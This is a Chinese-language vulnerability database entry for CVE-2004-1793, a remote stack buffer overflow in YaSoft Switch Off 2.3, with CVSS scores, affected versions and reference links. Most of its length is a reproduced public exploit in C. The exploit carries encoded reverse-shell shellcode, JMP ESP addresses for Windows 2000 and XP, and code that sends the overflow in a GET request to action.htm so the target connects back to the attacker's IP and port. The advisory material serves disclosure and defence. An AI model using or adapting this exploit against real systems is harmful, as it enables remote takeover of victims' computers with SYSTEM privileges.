CVE-2004-1793
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:42:22
NMCOE    

[原文]Stack-based buffer overflow in swnet.dll in YaSoft Switch Off 2.3 and earlier allows remote authenticated users to execute arbitrary code via a long message parameter in a SendMsg action to action.htm.


[CNNVD]YaSoft Switch SendMsg远程缓冲区溢出漏洞(CNNVD-200412-1166)

        
        Switch Off是一款简单易用的托盘式系统工具,可自动执行经常使用的操作,如关闭或重启动计算机,关闭拨号连接等。
        Switch Off不正确处理用户提交的消息请求,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出,精心提交数据可能以SYSTEM进程权限在系统上执行任意指令。
        问题存在action.htm脚本中,由于对用户提交给'message'参数的数据缺少正确的边界缓冲区检查,提交超长字符串作为此参数数据,可触发缓冲区溢出,可能以SYSTEM进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:yatsoft:switch_off:1.7
cpe:/a:yatsoft:switch_off:2.2
cpe:/a:yatsoft:switch_off:2.0
cpe:/a:yatsoft:switch_off:2.3
cpe:/a:yatsoft:switch_off:1.1
cpe:/a:yatsoft:switch_off:0.7
cpe:/a:yatsoft:switch_off:2.1
cpe:/a:yatsoft:switch_off:1.0
cpe:/a:yatsoft:switch_off:1.6
cpe:/a:yatsoft:switch_off:1.2
cpe:/a:yatsoft:switch_off:1.3
cpe:/a:yatsoft:switch_off:1.4
cpe:/a:yatsoft:switch_off:1.9
cpe:/a:yatsoft:switch_off:1.8
cpe:/a:yatsoft:switch_off:1.5.1
cpe:/a:yatsoft:switch_off:1.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1793
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1793
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1166
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/14124
(UNKNOWN)  XF  switch-off-swnet-bo(14124)
http://www.securityfocus.com/bid/9340
(UNKNOWN)  BID  9340
http://www.securityfocus.com/archive/1/348693
(UNKNOWN)  BUGTRAQ  20040102 Switch Off Multiple Vulnerabilities
http://www.osvdb.org/3309
(UNKNOWN)  OSVDB  3309
http://www.elitehaven.net/switchoff.txt
(UNKNOWN)  MISC  http://www.elitehaven.net/switchoff.txt
http://securitytracker.com/id?1008581
(UNKNOWN)  SECTRACK  1008581
http://secunia.com/advisories/10521
(UNKNOWN)  SECUNIA  10521

- 漏洞信息

YaSoft Switch SendMsg远程缓冲区溢出漏洞
高危 边界条件错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Switch Off是一款简单易用的托盘式系统工具,可自动执行经常使用的操作,如关闭或重启动计算机,关闭拨号连接等。
        Switch Off不正确处理用户提交的消息请求,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出,精心提交数据可能以SYSTEM进程权限在系统上执行任意指令。
        问题存在action.htm脚本中,由于对用户提交给'message'参数的数据缺少正确的边界缓冲区检查,提交超长字符串作为此参数数据,可触发缓冲区溢出,可能以SYSTEM进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        YaSoft
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://yasoft.km.ru/eng/switchoff/

- 漏洞信息 (23509)

YaSoft Switch Off 2.3 swnet.dll Remote Buffer Overflow Vulnerability (EDBID:23509)
windows remote
2004-01-02 Verified
0 MrNice
N/A [点击下载]
source: http://www.securityfocus.com/bid/9340/info

A vulnerability has been identified in the YaSoft Switch Off software package when handling message requests. The buffer overrun condition exists in the 'swnet.dll' module of the software due to insufficient bounds checking performed by the affected component. The overflow may be caused by sending an excessively long 'message' parameter to the application. This may make it possible for a remote user to execute arbitrary code through a vulnerable server.

/*******************************************************************/
/* [Crpt] Switch Off 2.3 exploit by MrNice [Crpt] */
/* --------------------------------------------------------------- */
/* */
/* Coder : MrNice */
/* Released on : 07/01/2004 */
/* Tested on : 2k Sp0 & Xp sp0 */
/* Advisory : www.securiteam.com/windowsntfocus/5BP011FBPI.html*/
/* Tech : The overflow can be caused by supplying an overly*/
/* long 'message' parameter to the application. */
/* */
/* If a password has been set, you will have to have*/
/* logged in to the server before issuing a */
/* malicious request to cause the overflow. */
/*******************************************************************/
/* www.coromputer.net && #coromputer on underet */
/******C***O***R***O***M***P***U***T***E***R*****2***0***0***4******/

#ifdef _WIN32
#include <winsock.h>
#include <windows.h>
#define close closesocket
#pragma comment (lib,"ws2_32")
#else
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//#define JMP_ESP_2K "\x1F\xE5\xC7\x77" //2k sp0 FR
//#define JMP_ESP_XP "\xE7\x80\x9C\x71" //xp pro sp0 FR

#define JMP_ESP_2K "\xB8\x64\x75\x71"
#define JMP_ESP_XP "\xC1\x1C\x35\x77"


char ReversShell[]= //Dexorer without call (ff..) coded by MrNice
"\x83\xEC\x50\xD9\xE1\xD9\x34\x24\x5B\x5B\x5B\x5B\x80\xEB\xE7\x33"
"\xC9\x66\x81\xC1\x4F\x01\x80\x33\x96\x43\xE2\xFA"
//Reverse Shell from Metasploit
"\x7e\xa6\x96\x96\x96\xd5\xdb\xd2\x96\x71\xef\x50\xef\x7a\x6f\x3c"
"\xf6\x4f\x9f\x63\x3b\x5d\x7b\x6a\xad\x18\xd8\x98\x7a\xe8\x4e\x74"
"\xe5\x3b\x4f\x93\x58\xe4\x68\x25\x80\xc1\xc5\xa4\xc9\xa5\xa4\xb8"
"\xd2\xda\xda\x96\x97\xcd\xc2\x1f\x73\x1f\xcb\x96\xfc\xa6\xcf\xf2"
"\x1d\x97\x1d\xd6\x9a\x1d\xe6\x8a\x3b\x1d\xce\x9e\x7d\x9a\x1b\xc1"
"\xb2\xc7\xc4\x69\x46\x1f\x55\xcf\x7d\x86\xfc\x9e\xc8\x97\x78\xfc"
"\x9e\xcf\x1d\xeb\x96\x16\x6f\x92\xe2\x72\xc7\xc5\x69\xa2\x19\x7e"
"\x15\x96\x96\x96\xcf\x1f\x92\x18\x74\x7d\xa7\x69\xf0\x17\x7a\x06"
"\x97\xc2\xfe\x97\x97\x96\x96\x69\xc3\x8e\xc1\xc1\xc1\xc1\xd1\xc1"
"\xd1\xc1\x69\xc3\x82\x1f\x55\xa7\x69\xfe\x56\x3e\x96\x61\xfe\x94"
"\x96\xb4\x87\x1f\x77\xfc\x86\xc7\xc5\x69\xc3\x86\x13\x56\xe3\xd2"
"\x1b\xaa\xb2\xa7\x56\xfc\x83\xcf\x65\x3d\x50\xd2\xb2\x86\xd2\x68"
"\xd2\xb2\xab\x1f\xca\xb2\xde\x1f\xca\xb2\xda\x1f\xca\xb2\xc6\x1b"
"\xd2\xb2\x86\xc2\xc6\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x69\xe3\x96"
"\xc7\x69\xc3\xbe\x1f\x77\xfe\x69\x69\x69\x69\x69\xa7\x69\xc3\xb2"
"\xc1\x69\xc3\x9a\x69\xc3\xb6\xc5\xc3\xc0\xc1\x1d\xfa\xb2\x8e\x1d"
"\xd3\xaa\x1d\xc2\x93\xee\x97\x7c\x1d\xdc\x8e\x1d\xcc\xb6\x97\x7d"
"\x75\xa4\xdf\x1d\xa2\x1d\x97\x78\xa7\x69\x6a\xa7\x56\x3a\xae\x76"
"\xe2\x91\x57\x59\x9b\x97\x51\x7d\x64\xad\xea\xb2\x82\xe3\x77\x1d"
"\xcc\xb2\x97\x7d\xf0\x1d\x9a\xdd\x1d\xcc\x8a\x97\x7d\x1d\x92\x1d"
"\x97\x7e\x7d\x94\xa7\x56\x1f\x7c\xc9\xc8\xcb\xcd\x54\x9e\x96";

  
//Fonction who set the shellcode coded by Kralor[crpt]
void set_sc(char *rhost, int rport, char *shellc0de)
   {
  unsigned int ip=0;
  unsigned short port=0;
  char *port_to_shell="",*ip1="";

  ip = inet_addr(rhost); ip1 = (char*)&ip;
  shellc0de[182]=ip1[0]^0x96;shellc0de[183]=ip1[1]^0x96;
  shellc0de[184]=ip1[2]^0x96; shellc0de[185]=ip1[3]^0x96;

  port = htons(rport);
  port_to_shell = (char *) &port;
  shellc0de[189]=port_to_shell[0]^0x96;
  shellc0de[190]=port_to_shell[1]^0x96;

   }

void banner()
   {
    printf("\n\t [Crpt] Switch Off 2.3 Remote Exploit by MrNice [Crpt]\n");
  printf("\t\t www.coromputer.net && Undernet #coromputer\n");
        printf("\t---------------------------------------------------------------\n\n");
   }
   
void usage(char *exe)
   {
    printf("\n\t [Crpt] Switch Off 2.3 Remote Exploit by MrNice [Crpt]\n");
  printf("\t\t www.coromputer.net && Undernet #coromputer\n");
        printf("\t---------------------------------------------------------------\n\n");
        printf("Syntax : %s <ip_vulnerable> <your_ip> <listening_port> <cible>\n",exe);
        printf("\nCible : \t0 - Windows 2000 (default)\n");
        printf("\t\t1 - Windows Xp\n\n");
        exit (-1);
   }
   
int main(int argc, char *argv[])
{
  int hsocket;

  struct hostent *host;
    struct in_addr adresseIP;
    struct sockaddr_in adressesocket;
   
    char BadString[700],Request[800];

  int i,len,cible=0;
  
  #ifdef _WIN32
  WSADATA wsaData;
  #endif
  
  if(argc<4)
     {
       usage(argv[0]);
   }
  
  if(argc>4)
     {
       cible=atoi(argv[4]);
     }
     
  banner();
  
  #ifdef _WIN32
    if(WSAStartup(0x101,&wsaData))
     {
    printf("[-] Unable to load winsock\n");
                exit (-1);
     }
  else
     {
       printf("[+] Winsock loaded\n");
     }
  #endif

  //Cr�ation de la socket
    if((hsocket=socket(AF_INET,SOCK_STREAM,0))==-1)
    {
    printf("[-] Can't creat Socket\n");
    exit (-1);
    }
  else
     {
    printf("[+] Socket created\n");
     }
   
   //GetHostByName()
   if((host=gethostbyname(argv[1]))==0)
   {
   printf("[-] Can't acquire remote info\n");
   close(hsocket);
   exit (-1);
   }
  else
     {
    printf("[+] Remote info Acquired\n");
     }

   memcpy(&adresseIP,host->h_addr,host->h_length);
  
   //Preparation de la struct sockaddr_in
   memset(&adressesocket,0,sizeof(struct sockaddr_in));
   adressesocket.sin_family=AF_INET;
   adressesocket.sin_port=htons(8000);
   memcpy(&adressesocket.sin_addr,host->h_addr,host->h_length);

  
   if(connect(hsocket,(struct sockaddr *)&adressesocket,sizeof(struct sockaddr_in))==-1)
   {
   printf("[-] Can't connect on %s:8000\n",argv[1]);
   close(hsocket);
   exit (-1);
   }
  else
     {
    printf("[+] Connected on %s:8000\n",argv[1]);
     }
  
  set_sc(argv[2], atoi(argv[3]),ReversShell);
  printf("[+] Reverse ShellCode built\n",argv[1]);
  
  for(i=0;i<700;i++)
     {
    BadString[i]=(char)0x90;
     }
     
  for(i=260;i<623;i++)
     {
    BadString[i]=ReversShell[i-260];
     }
     
  if(cible==0)
     {
    memcpy(&BadString[256],JMP_ESP_2K,4);
     }
  else
     {
       memcpy(&BadString[256],JMP_ESP_XP,4);
     }
     
  BadString[700]=0x00;
  
  memset(Request,'\x00',sizeof(Request));
  sprintf(Request,"GET /action.htm?action=SendMsg&message=%s HTTP/1.1\r\n"
      "Host: 10.0.0.6:8000\r\n"
      "\r\n",BadString);
        
  printf("[+] BadString constructed\n");
  
  if((len=send(hsocket,Request,strlen(Request),0))==-1)
      {
    printf("[-] Error on sending BadString\n");
      close(hsocket);
      exit (-1);
      }
     else
     {
     printf("[+] BadString Sended (%d)\n",len);
     }
  return 0;
   }

		

- 漏洞信息

3309
Switch Off swnet.dll SendMsg Action message Variable Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2004-01-03 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站